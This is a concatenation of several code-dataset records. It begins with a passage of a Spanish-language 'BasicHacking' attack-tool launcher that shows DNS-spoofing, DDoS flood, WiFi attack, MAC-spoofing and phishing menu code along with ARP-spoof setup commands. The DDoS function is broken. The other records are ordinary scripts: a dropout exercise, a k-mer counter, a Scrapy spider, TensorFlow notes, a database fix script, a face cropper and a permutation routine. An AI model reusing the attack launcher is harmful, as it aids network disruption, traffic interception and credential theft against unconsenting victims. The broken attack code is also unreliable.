cmd_opts)\r\n except getopt.GetoptError:\r\n usage()\r\n\r\n for opt in opts:\r\n if opt[0] == \"-i\":\r\n dev = opt[1]\r\n elif opt[0] == \"-f\":\r\n file = opt[1]\r\n else:\r\n usage()\r\n\r\n if file:\r\n parse_host_file(file)\r\n else:\r\n usage()\r\n\r\n print(\"Spoofing DNS requests on %s\" % (dev))\r\n scapy.sniff(iface=dev, filter=filter, prn=handle_packet)\r\ndef DDOS():\r\n ip = input(\"IP:\")\r\n port = input(\"PUERTO:\")\r\n hilos = input(\"Nº hilos>\")\r\n while True:\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((ip, port))\r\n s.sendto(('GET /' + ip + ' HTTP/1.1\\r\\n').encode('ascii', (ip, port)))\r\n \r\n\r\n for _ in range(hilos):\r\n thread = threading.Thread(target=attack)\r\n thread.start()\r\ndef changeMAC():\r\n print(\"ponga la interfaz actual (eth0,wlan0)\")\r\n interfaz = input(\">>>\")\r\n os.system(\"macchanger -r \"+interfaz+\"\")\r\n\r\ndef WPSattack():\r\n print(\" TPLINK -->> 1\")\r\n print(\" Ddos -->> 2\")\r\n print(\" Linset(Rogue AP) -->> 3\")\r\n print(\" bruteforce -->>4\")\r\n tool = input(\"?:\")\r\n if tool == \"1\":\r\n TPLINK()\r\n if tool == \"2\":\r\n os.system(\"sudo cmod +x wifiDos.sh\")\r\n os.system(\"sudo bash wifiDos.sh\")\r\n if tool == \"3\":\r\n Linset()\r\n if tool == \"4\":\r\n WifiCrack()\r\n\r\n\r\n\r\nprint(\"DNSpoofer -->> remplaza un DNS haciendo que salga otra web\")\r\nprint(\"Godkiller -->> Floodea a un numero de telefono por linea directa y manda mensajes customizados\")\r\nprint(\"phoneinfoga -->> Saca la informacion de un numero de telefono\")\r\nprint(\"password speed -->> Check the password crack speed with Sha,MD5,NTLM,LM.etc\")\r\nprint(\"BTC -->> Visuiona las transacciones recientes y el saldo de una billetera BTC\")\r\nprint(\"Sniffer -->> captura los datos de las señales HTTP y recoge la contraseña junto al usuario\")\r\nprint(\" WPS -->> Ataques a diferentes redes wifi\")\r\nprint(\"Ufonet -->> ataque Dos o Ddos a una IP con distintos protocolos\")\r\nprint(\"Ddos -->> un simple ataque distribuido\")\r\nprint(\"XSS -->> realiza un escaneo/ataque en XSS\")\r\nprint(\"vulnerabilidades -->> realiza un escaner de vulnerabilidades con spaghetti\")\r\nprint(\" Phishing -->> Un ataque phisher que puede ser juntado con el DNS spoofer \")\r\nprint(\"checkSpyware --> Detecta los software maliciosos como por ejemplo PEGASUS\")\r\nprint(\"FMhack -->> Interfiere en las radiofrecuencias\")\r\nprint(\"GPS -->> una herramienta para calcular el sitio de un emisor por ondas de radio\")\r\nprint(\"changeIP -->> cambia tu direccion IP pubica con una VPN\")\r\nprint(\"Wifi speed -->> Monitorea la velocidad wifi(puede sertvir para comprobar la tasa de flood)\")\r\nprint(\"Localflood -->> floodea un wifi creando localhosts en diversos puertos\")\r\nprint(\"MAC -->> Cambia la mac del dispositivo, asi haciendolo indetectable\")\r\nprint(\"\")\r\nprint(\"para iniciar DNSspoofer y sniffer se debe iniciar primero:\")\r\nprint(\" sudo python3 arp-spoofer.py\")\r\nprint(\" sudo iptables -I FORWARD -j NFQUEUE --queue-num 0\")\r\nprint(\"en una consola aparte.Muchas Gracias ;D\")\r\n\r\n\r\nthetool = input(\">\")\r\nif thetool == \"DNSpoofer\":\r\n DNSspoofer()\r\nif thetool == \"goodkiller\":\r\n goodkiller()\r\nif thetool == \"bruteforce\":\r\n bruteforce()\r\nif thetool == \"Wifi Speed\":\r\n wifispeed()\r\nif thetool == \"phoneinfoga\":\r\n phoneinfoga()\r\nif thetool == \"password speed\":\r\n passwordspeed()\r\nif thetool == \"BTC\":\r\n BTCanalizer()\r\nif thetool == \"sniffer\":\r\n sniffer()\r\nif thetool == \"Ddos\":\r\n DDOS()\r\nif thetool == \"Phisher\":\r\n Phishing()\r\nif thetool == \"GPS\":\r\n GPS()\r\nif thetool == \"localflood\":\r\n localflood()\r\nif thetool == \"Ufonet\":\r\n Ufonet()\r\nif thetool == \"checkSpyware\":\r\n checkSPY()\r\nif thetool == \"FMhack\":\r\n FMhack()\r\nif thetool == \"changeMAC\":\r\n changeMAC()\r\nif thetool == \"changeIP\":\r\n VPN()\r\nif thetool == \"WPS\":\r\n WPSattack()\r\nif thetool == \"XSS\":\r\n XSSattack()\r\nif thetool == \"vulnerabilidades\":\r\n vulnerability()\r\n","repo_name":"mouse3/BasicHacking","sub_path":"HTC.py","file_name":"HTC.py","file_ext":"py","file_size_in_byte":22368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"74483490612","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport sklearn\nimport sklearn.datasets\nimport scipy.io\n\nfrom deep_learning.initialization.init_utils import forward_propagation\nfrom deep_learning.regularization.reg_utils import load_2d_data_set, compute_cost, initialize_parameters, \\\n update_parameters, backward_propagation, predict, plot_decision_boundary, predict_dec, relu, sigmoid\nfrom deep_learning.regularization.test_case import compute_cost_with_regularization_test_case, \\\n backward_propagation_with_regularization_test_case, forward_propagation_with_dropout_test_case\n\n\ndef compute_cost_with_regularization(a3: np.ndarray, y: np.ndarray, parameters: dict, lam: float):\n W_sum = 0\n for k, v in parameters.items():\n if \"W\" in k:\n W_sum += np.sum(np.square(v))\n reg = lam * W_sum / (2 * y.shape[1])\n return compute_cost(a3, y) + reg\n\n\ndef backward_propagation_with_regularization(x: np.ndarray, y: np.ndarray, cache: list, lam: float):\n m = x.shape[1]\n (Z1, A1, W1, b1, Z2, A2, W2, b2, Z3, A3, W3, b3) = cache\n dZ3 = A3 - y\n dW3 = np.dot(dZ3, A2.T) / m + lam * W3 / m\n db3 = np.sum(dZ3, axis=1, keepdims=True) / m\n dA2 = np.dot(W3.T, dZ3)\n dZ2 = np.multiply(dA2, np.int64(A2 > 0))\n dW2 = np.dot(dZ2, A1.T) / m + lam * W2 / m\n db2 = np.sum(dZ2, axis=1, keepdims=True) / m\n dA1 = np.dot(W2.T, dZ2)\n dZ1 = np.multiply(dA1, np.int64(A1 > 0))\n dW1 = np.dot(dZ1, x.T) / m + lam * W1 / m\n db1 = np.sum(dZ1, axis=1, keepdims=True) / m\n return {\"dZ3\": dZ3, \"dW3\": dW3, \"db3\": db3, \"dA2\": dA2,\n \"dZ2\": dZ2, \"dW2\": dW2, \"db2\": db2, \"dA1\": dA1,\n \"dZ1\": dZ1, \"dW1\": dW1, \"db1\": db1}\n\n\ndef model(x, y, learning_rate=0.3, num_iterations=30000, print_cost=True, lam=0.0, keep_prob=1.0):\n \"\"\"\n Implements a three-layer neural network: LINEAR->RELU->LINEAR->RELU->LINEAR->SIGMOID.\n\n Arguments:\n X -- input data, of shape (input size, number of examples)\n Y -- true \"label\" vector (1 for blue dot / 0 for red dot), of shape (output size, number of examples)\n learning_rate -- learning rate of the optimization\n num_iterations -- number of iterations of the optimization loop\n print_cost -- If True, print the cost every 10000 iterations\n lambd -- regularization hyperparameter, scalar\n keep_prob - probability of keeping a neuron active during drop-out, scalar.\n\n Returns:\n parameters -- parameters learned by the model. They can then be used to predict.\n \"\"\"\n\n grads = {}\n costs = [] # to keep track of the cost\n layers_dims = [x.shape[0], 20, 3, 1]\n\n # Initialize parameters dictionary.\n parameters = initialize_parameters(layers_dims)\n\n # Loop (gradient descent)\n\n for i in range(0, num_iterations):\n\n # Forward propagation: LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SIGMOID.\n if keep_prob >= 1:\n a3, cache = forward_propagation(x, parameters)\n else:\n a3, cache = forward_propagation_with_dropout(x, parameters, keep_prob)\n # Cost function\n if lam == 0:\n cost = compute_cost(a3, y)\n else:\n cost = compute_cost_with_regularization(a3, y, parameters, lam)\n\n # Backward propagation.\n assert (lam == 0 or keep_prob == 1) # it is possible to use both L2 regularization and dropout,\n # but this assignment will only explore one at a time\n if lam == 0 and keep_prob == 1:\n grads = backward_propagation(x, y, cache)\n elif lam != 0:\n grads = backward_propagation_with_regularization(x, y, cache, lam)\n elif keep_prob < 1:\n grads = backward_propagation_with_dropout(x, y, cache, keep_prob)\n\n # Update parameters.\n parameters = update_parameters(parameters, grads, learning_rate)\n\n # Print the loss every 10000 iterations\n if print_cost and i % 10000 == 0:\n print(\"Cost after iteration {}: {}\".format(i, cost))\n if print_cost and i % 1000 == 0:\n costs.append(cost)\n\n # plot the cost\n plt.plot(costs)\n plt.ylabel('cost')\n plt.xlabel('iterations (x1,000)')\n plt.title(\"Learning rate =\" + str(learning_rate))\n plt.show()\n\n return parameters\n\n\ndef forward_propagation_with_dropout(x, parameters, keep_prob=0.5):\n np.random.seed(1)\n\n W1 = parameters['W1']\n b1 = parameters['b1']\n W2 = parameters['W2']\n b2 = parameters['b2']\n W3 = parameters['W3']\n b3 = parameters['b3']\n\n Z1 = np.dot(W1, x) + b1\n A1 = relu(Z1)\n D1 = np.random.rand(A1.shape[0], A1.shape[1])\n D1 = D1 < keep_prob\n A1 = A1 * D1 / keep_prob\n Z2 = np.dot(W2, A1) + b2\n A2 = relu(Z2)\n D2 = np.random.rand(A2.shape[0], A2.shape[1])\n D2 = D2 < keep_prob\n A2 = A2 * D2 / keep_prob\n Z3 = np.dot(W3, A2) + b3\n A3 = sigmoid(Z3)\n cache = (Z1, D1, A1, W1, b1, Z2, D2, A2, W2, b2, Z3, A3, W3, b3)\n return A3, cache\n\n\ndef backward_propagation_with_dropout(x, y, cache, keep_prob):\n m = x.shape[1]\n (Z1, D1, A1, W1, b1, Z2, D2, A2, W2, b2, Z3, A3, W3, b3) = cache\n\n dZ3 = A3 - y\n dW3 = 1. / m * np.dot(dZ3, A2.T)\n db3 = 1. / m * np.sum(dZ3, axis=1, keepdims=True)\n dA2 = np.dot(W3.T, dZ3)\n dA2 = dA2 * D2 # Step 1: Apply mask D2 to shut down the same neurons as during the forward propagation\n dA2 = dA2 / keep_prob # Step 2: Scale the value of neurons that haven't been shut down\n dZ2 = np.multiply(dA2, np.int64(A2 > 0))\n dW2 = 1. / m * np.dot(dZ2, A1.T)\n db2 = 1. / m * np.sum(dZ2, axis=1, keepdims=True)\n\n dA1 = np.dot(W2.T, dZ2)\n dA1 = dA1 * D1 # Step 1: Apply mask D1 to shut down the same neurons as during the forward propagation\n dA1 = dA1 / keep_prob # Step 2: Scale the value of neurons that haven't been shut down\n dZ1 = np.multiply(dA1, np.int64(A1 > 0))\n dW1 = 1. / m * np.dot(dZ1, x.T)\n db1 = 1. / m * np.sum(dZ1, axis=1, keepdims=True)\n\n return {\"dZ3\": dZ3, \"dW3\": dW3, \"db3\": db3, \"dA2\": dA2,\n \"dZ2\": dZ2, \"dW2\": dW2, \"db2\": db2, \"dA1\": dA1,\n \"dZ1\": dZ1, \"dW1\": dW1, \"db1\": db1}\n\n\ndef plot_regularization_l2():\n train_x, train_y, test_x, test_y = load_2d_data_set()\n parameters = model(train_x, train_y, lam=0.7)\n print(\"On the train set:\")\n predict(train_x, train_y, parameters)\n print(\"On the test set:\")\n predict(train_x, train_y, parameters)\n\n plt.title(\"Model with L2-regularization\")\n axes = plt.gca()\n axes.set_xlim([-0.75, 0.40])\n axes.set_ylim([-0.75, 0.65])\n plot_decision_boundary(lambda x: predict_dec(parameters, x.T), train_x, train_y)\n\n\ndef plot_drop_out():\n train_x, train_y, test_x, test_y = load_2d_data_set()\n\n parameters = model(train_x, train_y, keep_prob=0.86, learning_rate=0.3)\n print(\"On the train set:\")\n predict(train_x, train_y, parameters)\n print(\"On the test set:\")\n predict(test_x, test_y, parameters)\n\n plt.title(\"Model with dropout\")\n axes = plt.gca()\n axes.set_xlim([-0.75, 0.40])\n axes.set_ylim([-0.75, 0.65])\n plot_decision_boundary(lambda x: predict_dec(parameters, x.T), train_x, train_y)\n\n\nplot_drop_out()\n","repo_name":"YaoIna/PythonStart","sub_path":"deep_learning/regularization/regularization.py","file_name":"regularization.py","file_ext":"py","file_size_in_byte":7107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"19478911784","text":"# Find the most frequent k-mers in a DNA string\n\nimport collections\n\n# Asking for the DNA string\n\ndna = input(\"DNA string?\")\nprint(\"Length of DNA string:\", len(dna))\n\n# Asking for the length of k\n\n\ndef input_k (message):\n while True:\n try:\n user_input = int(input(message))\n except ValueError:\n print(\"Not a valid number.\")\n print(\"Please enter a number!\")\n continue\n else:\n return user_input\n break\n\n\nk = input_k(\"Please enter the length of k:\")\n\n# Asking for the allowed error\n\n\ndef input_m(message):\n while True:\n try:\n user_input = int(input(message))\n except ValueError:\n print(\"Not a valid number.\")\n print(\"Please enter a number!\")\n continue\n else:\n return user_input\n break\n\n\nm = input_m (\"Please enter the allowed error:\")\n\n# Counting function\nin_mistake = m\nout_result = []\nkmer_list = []\n\n\ndef hamming_distance(s1, s2):\n if len(s1) != len(s2):\n raise ValueError()\n else:\n return sum(ch1 != ch2 for ch1, ch2 in zip(s1, s2))\n\n\nfor i in range(len(dna)-k + 1):\n v = dna[i:i + k]\n out_result.append(v)\n\n\nfor i in range(len(out_result) - 1):\n for j in range(i+1, len(out_result)):\n if hamming_distance(str(out_result[i]), str(out_result[j])) <= in_mistake:\n kmer_list.extend([out_result[i], out_result[j]])\n\n\nkmer_count = collections.Counter(kmer_list).most_common(14)\n\nprint(\"Most frequent kmers:\", (kmer_count))\n\n\n\n","repo_name":"pnawrath/bioinfomatics","sub_path":"finding k-mers.py","file_name":"finding k-mers.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"41561546801","text":"# -*- coding: utf-8 -*-\n\nimport scrapy\nfrom ..pdf2txt import readPDF\nimport os\n\nclass BaiInfoNews(scrapy.Spider):\n name = 'baiinfo_news'\n\n def start_requests(self):\n url = 'http://www.baiinfo.com/Orders/NewsList/7704'\n headers = {'Referer': 'http://www.baiinfo.com/yjbg/yanjiugaobao',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu '\n 'Chromium/57.0.2987.98 Chrome/57.0.2987.98 Safari/537.36'}\n yield scrapy.Request(url, headers=headers, callback=self.parse)\n\n def parse(self, response):\n news_list = response.xpath('//div[@class=\"news_more_left\"]/ul/li')\n for news in news_list:\n title = news.xpath('a//text()').extract_first().replace('/', '-')\n url = news.xpath('a/@href').extract_first()\n publish_date = news.xpath('span/text()').extract_first()\n headers = {'Referer': 'http://www.baiinfo.com/yjbg/yanjiugaobao',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu '\n 'Chromium/57.0.2987.98 Chrome/57.0.2987.98 Safari/537.36'}\n if 'Orders' in url:\n url = 'http://www.baiinfo.com' + url\n yield scrapy.Request(url,\n headers=headers,\n meta={'title': title, 'publish_date': publish_date},\n callback=self.detail_parse)\n\n page_info = response.xpath('//div[@class=\"news_tel_4\"]/ul/div/a')\n for curr in page_info:\n page_indentify = curr.xpath('text()').extract_first()\n if page_indentify == '下一页':\n next_page = 'http://www.baiinfo.com' + curr.xpath('@href').extract_first()\n headers = {'Referer': 'http://www.baiinfo.com/yjbg/yanjiugaobao',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu '\n 'Chromium/57.0.2987.98 Chrome/57.0.2987.98 Safari/537.36'}\n yield scrapy.Request(next_page, headers=headers, callback=self.parse)\n\n def detail_parse(self, response):\n title = response.meta['title']\n publish_date = response.meta['publish_date']\n file_dir = self.path + '/' + publish_date\n self.logger.info(publish_date)\n self.logger.info(title)\n\n file_path = self.path + '/' + publish_date + '/' + title # no include extention\n if not os.path.exists(file_dir):\n os.makedirs(file_dir)\n content = ''.join(response.xpath('//ul[@class=\"news_tel_z\"]//text()').extract())\n if '点击下载' in content:\n pdf_url = response.xpath('//ul[@class=\"news_tel_z\"]/div[@class=\"news_tex\"]//a/@href').extract_first()\n headers = {'Referer': 'http://www.baiinfo.com/yjbg/yanjiugaobao',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu '\n 'Chromium/57.0.2987.98 Chrome/57.0.2987.98 Safari/537.36'}\n yield scrapy.Request(pdf_url, headers=headers, meta={'file_path': file_path}, callback=self.downloads)\n else:\n with open(file_path+'.txt', 'w') as f:\n f.write(content)\n\n def downloads(self, response):\n file_path = response.meta['file_path']\n with open(file_path+'.pdf', 'wb') as f:\n f.write(response.body)\n ret = readPDF(file_path+'.pdf')\n","repo_name":"csyezheng/web-scraping-examples","sub_path":"baiinfo_news/baiinfo_news/spiders/baiinfo_news.py","file_name":"baiinfo_news.py","file_ext":"py","file_size_in_byte":3611,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
+{"seq_id":"15972225091","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport tensorflow as tf\n'''\n\n#Central to TF is tensors. Primitive values shaped into an array. Rank is dimensions. Shape is tuple of ints specifying arrays length\n#numpy arrays represent tensors\n\n#The TF core is the computational graph and running it in a session\n\n# Graphs have Operations representing nodes, and tensors as edges\n\na = tf.constant(3.0, dtype=tf.float32)\nb = tf.constant(4.0) # also tf.float32 implicitly\ntotal = a + b\n\nprint(a)\nprint(b)\nprint(total)\n\n\n\n#The above outputs the computational graph, each with a unique name. Not values.\n\n\n# evaluation requires creating a tf.Session object.\n\nsess = tf.Session()\nprint(sess.run(total))\n\nprint(sess.run({'ab':(a, b), 'total':total}))\n\nvec = tf.random_uniform(shape=(3,))\nout1 = vec + 1\nout2 = vec + 2\nprint(sess.run(vec))\nprint(sess.run(vec))\nprint(sess.run((out1, out2)))\n\n# A ML graph needs variable result. Placeholders are designed to hold future values\nx = tf.placeholder(tf.float32)\ny = tf.placeholder(tf.float32)\nz = x + y\n\nprint(sess.run(z, feed_dict={x: 3, y: 4.5}))\nprint(sess.run(z, feed_dict={x: [1, 3], y: [2, 4]}))\n\n#Datasets are however the preffered way of working with models\n\nmy_data = [\n [0, 1,],\n [2, 3,],\n [4, 5,],\n [6, 7,],\n]\nslices = tf.data.Dataset.from_tensor_slices(my_data)\nnext_item = slices.make_one_shot_iterator().get_next()\n\nwhile True:\n try:\n print(sess.run(next_item))\n except tf.errors.OutOfRangeError:\n break\n\n#If statefull the itterator may need to initialized\n\nr = tf.random_normal([10,3])\ndataset = tf.data.Dataset.from_tensor_slices(r)\niterator = dataset.make_initializable_iterator()\nnext_row = iterator.get_next()\n\nsess.run(iterator.initializer)\nwhile True:\n try:\n print(sess.run(next_row))\n except tf.errors.OutOfRangeError:\n break\n\n#Trainable models need values to to be modified in the graph to reach now outputs with same inputs.\n# Layers are used and package variables and opperations together.\n# A denseely-connected layer applies an opitonal activation on the output to all functions inputs\n\nx = tf.placeholder(tf.float32, shape=[None, 3])\nlinear_model = tf.layers.Dense(units=1)\ny = linear_model(x)\n\n#Initializing the layers resulting variables\ninit = tf.global_variables_initializer()\nsess.run(init)\n\n#Now we can evaluate the linear model's output tensors as any otherself.\n\nprint(sess.run(y, {x: [[1, 2, 3],[4, 5, 6]]}))\n\n# Condensed removing access to the linear model layer\nx = tf.placeholder(tf.float32, shape=[None, 3])\ny = tf.layers.dense(x, units=1)\ninit = tf.global_variables_initializer()\nsess.run(init)\nprint(sess.run(y, {x: [[1, 2, 3], [4, 5, 6]]}))\n\n# Feature columns are easiest done with tf.feature_column.input_layer and only accepts dense columnsself.\n# Viewing requires a wrapper of indicator_column\n\nfeatures = {\n 'sales' : [[5], [10], [8], [9]],\n 'department': ['sports', 'sports', 'gardening', 'gardening']}\n\ndepartment_column = tf.feature_column.categorical_column_with_vocabulary_list(\n 'department', ['sports', 'gardening'])\ndepartment_column = tf.feature_column.indicator_column(department_column)\n\ncolumns = [\n tf.feature_column.numeric_column('sales'),\n department_column\n]\n\ninputs = tf.feature_column.input_layer(features, columns)\n\n#Feature columns have an internal state like layers and require initializationself.\n# Categorical columns use lookup tables requiring a different intiialization, tf.tables_initializer\n\nvar_init = tf.global_variables_initializer()\ntable_init = tf.tables_initializer()\nsess = tf.Session()\nsess.run((var_init, table_init))\n\n# once sess initializes. Run\nprint(sess.run(inputs))\n\n\n# Training\n# Some arbritrary inputs\nx = tf.constant([[1], [2], [3], [4]], dtype=tf.float32, name=\"C1\")\ny_true = tf.constant([[0], [-1], [-2], [-3]], dtype=tf.float32, name=\"C2\")\n\n#The training model with one outputs\nlinear_model = tf.layers.Dense(units=1, name=\"L1\")\ny_pred = linear_model(x)\nsess = tf.Session()\ninit = tf.global_variables_initializer()\nsess.run(init)\nprint(sess.run(y_pred))\n\n# Loss to train\nloss = tf.losses.mean_squared_error(labels=y_true, predictions=y_pred)\nprint(sess.run(loss))\n\n#Optimizers test the loss\noptimizer = tf.train.GradientDescentOptimizer(0.01)\ntrain = optimizer.minimize(loss)\n\n#itterative training\nfor i in range(100):\n _, loss_value = sess.run((train, loss))\n print(loss_value)\n\n'''\n\n\n\n#Completed:\n\n#The input values\nx = tf.constant([[4], [3], [2], [1]], dtype=tf.float32, name=\"X\")\n#The comparison values\ny_true = tf.constant([[0], [-1], [-2], [-3]], dtype=tf.float32, name=\"Y_t\")\n#A dense LM\nlinear_model = tf.layers.Dense(units=1, name=\"Dense_LM\")\n'''Dense layer y_pred that takes a batch of input vectors,'''\n#assinged to y_predictions\ny_pred = linear_model(x)\n#With loss operations based on y_true labels and predictions dictated by the model\nloss = tf.losses.mean_squared_error(labels=y_true, predictions=y_pred)\n'''y_pred produces a single output and MSE judges it'''\n\n#Set up the basic trainer to minimize loss\noptimizer = tf.train.GradientDescentOptimizer(0.01, name=\"gdo\")\ntrain = optimizer.minimize(loss)\n\n#set internal states\ninit = tf.global_variables_initializer()\nsess = tf.Session()\nsess.run(init)\n\n#Train n times outputting a blank and the loss value.\n#Put the training function and loss function into the run function.\nfor i in range(10000):\n _, loss_value = sess.run((train, loss))\n print(loss_value)\n\n#Run the variables through the prediction model\nprint(sess.run(y_pred))\n\n\n\n\n\n#TensorBoard is a way to viusalize the graphself.\nwriter = tf.summary.FileWriter('.')\nwriter.add_graph(tf.get_default_graph())\n\n# Go into the directory and type `tensorboard --logdir .` to view your graph\n\n\ninput()\n","repo_name":"ECHibiki/TesnorFlow-Exercises","sub_path":"Tensorflow Examples/TF low level.py","file_name":"TF low level.py","file_ext":"py","file_size_in_byte":5781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"10706265044","text":"#!/usr/bin/env python\n\n'''Update the OntologyTreeStructureTable to fix the old na root term (which was undefined as contained many optional NAs)\n'''\n\nimport sys\n\nimport argparse\nimport re\nfrom collections import defaultdict\n\nimport oboparse\nimport psycopg2\n\nfrom dbbact_server import db_access\nfrom dbbact_server.utils import debug, SetDebugLevel\n\n__version__ = \"0.1\"\n\n\ndef fix_na(con, cur, commit=False):\n\t'''Update the OntologyTreeStructureTable to fix the old na root term (which was undefined as contained many optional NAs)\n\n\tParameters\n\t----------\n\tcon, cur: dbbact psycopg2 database connection and cursor\n\tcommit: bool, optional\n\t\tTrue to commit changes, False to just perform dry run\n\t'''\n\t# find the id of the dbbact ontology\n\tcur.execute('SELECT * FROM ontologynamestable WHERE description=%s', ['dbbact'])\n\tres = cur.fetchone()\n\tontologynameid = res['id']\n\tif ontologynameid != 8:\n\t\traise ValueError('strange dbbact ontologynameid: %s (instead of 8)' % ontologynameid)\n\n\t# find the dbbact root term id \"dbbact root\" (id 1811274)\n\tcur.execute('SELECT * from OntologyTable WHERE description=%s', ['dbbact root'])\n\tres = cur.fetchone()\n\tif res['term_id'] != 'dbbact:1811274':\n\t\traise ValueError('\"dbbact root\" term_id is %s instead of dbbact:1811274' % res['term_id'])\n\troot_id = res['id']\n\n\tcur.execute('SELECT * FROM OntologyTable WHERE term_id LIKE %s', ['dbbact:%'])\n\tdebug(3, 'Found %d dbbact terms' % cur.rowcount)\n\tres = cur.fetchall()\n\tnum_na_parents = 0\n\tfor cres in res:\n\t\tcur.execute('SELECT * FROM OntologyTreeStructureTable WHERE ontologyid=%s', [cres['id']])\n\t\ttres = cur.fetchall()\n\t\tfor ctres in tres:\n\t\t\tcur.execute('SELECT * FROM OntologyTable WHERE id=%s LIMIT 1', [ctres['ontologyparentid']])\n\t\t\tif cur.rowcount == 0:\n\t\t\t\tcontinue\n\t\t\tttres = cur.fetchone()\n\t\t\tif ttres['description'] == 'na':\n\t\t\t\tcur.execute('UPDATE OntologyTreeStructureTable SET ontologyparentid=%s, ontologynameid=%s WHERE uniqueid=%s', [root_id, ontologynameid, ctres['uniqueid']])\n\t\t\t\tnum_na_parents += 1\n\tdebug(4, 'updating %d dbbact terms roots' % num_na_parents)\n\tif commit:\n\t\tcon.commit()\n\t\tdebug(3, 'commited')\n\tdebug(3, 'done')\n\n\ndef main(argv):\n\tparser = argparse.ArgumentParser(description='Update the OntologyTreeStructureTable to fix the old na root term (which was undefined as contained many optional NAs). version ' + __version__, formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\tparser.add_argument('--port', help='postgres port', default=5432, type=int)\n\tparser.add_argument('--host', help='postgres host', default=None)\n\tparser.add_argument('--database', help='postgres database', default='dbbact')\n\tparser.add_argument('--user', help='postgres user', default='dbbact')\n\tparser.add_argument('--password', help='postgres password', default='magNiv')\n\tparser.add_argument('--debug-level', help='debug level (1 for debug ... 9 for critical)', default=2, type=int)\n\tparser.add_argument('--dry-run', help='do not commit', action='store_true')\n\targs = parser.parse_args(argv)\n\n\tSetDebugLevel(args.debug_level)\n\n\tcon, cur = db_access.connect_db(database=args.database, user=args.user, password=args.password, port=args.port, host=args.host)\n\tfix_na(con, cur, commit=not args.dry_run)\n\n\nif __name__ == \"__main__\":\n\tmain(sys.argv[1:])\n","repo_name":"amnona/dbbact-server","sub_path":"utils/fix_na.py","file_name":"fix_na.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"14964661386","text":"#googleimagesdownload -k \"\" -l 20\n\n\nimport cv2\nimport os\nimport shutil\n\norg_dir = \"dataset/01_org/\"\nface_dir = \"dataset/02_face/\"\n\ncascade_xml = \"haarcascade_frontalface_default.xml\"\n\n\ndef main():\n name_list = [filename for filename in os.listdir(org_dir) if not filename.startswith(\".\")]\n print(name_list)\n \n\n for name in name_list:\n name.replace(\" \", \"_\")\n org_char_dir = org_dir + name + \"/\"\n print(org_char_dir)\n\n face_char_dir = face_dir + name + \"/\"\n os.makedirs(face_char_dir, exist_ok=True)\n\n print(len(face_char_dir))\n\n detect_face(org_char_dir, face_char_dir)\n\ndef detect_face(org_char_dir, face_char_dir):\n image_list = os.listdir(org_char_dir)\n\n for image_file in image_list:\n \n org_image = cv2.imread(org_char_dir + image_file)\n\n if org_image is None:\n print(\"Not open:\", image_file)\n continue\n\n #convert gray_scale\n img_gs = cv2.cvtColor(org_image, cv2.COLOR_BGR2GRAY)\n \n #detect_face\n cascade = cv2.CascadeClassifier(cascade_xml)\n\n for i_mn in range(1, 7, 1):\n face_list = cascade.detectMultiScale(img_gs, scaleFactor=1.1, minNeighbors=i_mn, minSize=(200, 200))\n #if more than one_face detected, get image (64*64)\n if len(face_list ) > 0:\n for rect in face_list:\n image = org_image[rect[1]:rect[1]+rect[3], rect[0]:rect[0]+rect[2]]\n if image.shape[0] < 64 or image.shape[1] < 64:\n continue\n face_image = cv2.resize(image, (64, 64))\n\n else:\n continue\n \n\n #save face_image\n face_file_name = os.path.join(face_char_dir, \"face-\" + image_file)\n cv2.imwrite(str(face_file_name), face_image)\n\nif __name__ == \"__main__\":\n main()\n\n\n\n\n\n\n ","repo_name":"priekosukeyauchi/face_classification","sub_path":"02_face_detection.py","file_name":"02_face_detection.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"1320879076","text":"# Given an array nums of distinct integers, return all the possible permutations. You can return the answer in any order.\n\n\ndef backtracking(nums, arr, answers):\n if len(nums) == 0: \n answers.append(list(arr)) \n\n for i in range(0 , len(nums)):\n arr.append(nums[i])\n backtracking(nums[:i] + nums[i+1:], arr, answers) \n arr.pop() \n\ndef permute(nums):\n if len(nums) == 0:\n return answers\n \n arr = list()\n answers = list()\n\n backtracking(nums, arr, answers)\n \n return answers\n\n\nprint(permute([1,2,3])) # Output: [[1,2,3],[1,3,2],[2,1,3],[2,3,1],[3,1,2],[3,2,1]]\nprint(permute([0,1])) # Output: [[0,1],[1,0]]\nprint(permute([1])) # Output: [[1]]","repo_name":"YaraHorany/Programming-Challenges","sub_path":"Permutations.py","file_name":"Permutations.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
